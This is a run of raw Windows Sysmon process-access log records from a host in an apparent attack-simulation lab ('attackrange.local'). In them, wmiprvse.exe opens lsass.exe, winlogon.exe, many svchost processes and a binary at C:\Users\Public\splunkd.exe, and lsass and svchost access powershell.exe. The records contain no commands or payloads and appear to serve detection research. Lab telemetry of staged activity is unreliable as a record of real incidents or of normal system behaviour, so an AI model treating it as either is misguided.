15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.241{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.241{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.210{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.210{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000024594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:25.163{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m0544fyz.q3h.ps12021-01-20 15:59:25.163 10341000x800000000000000024593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 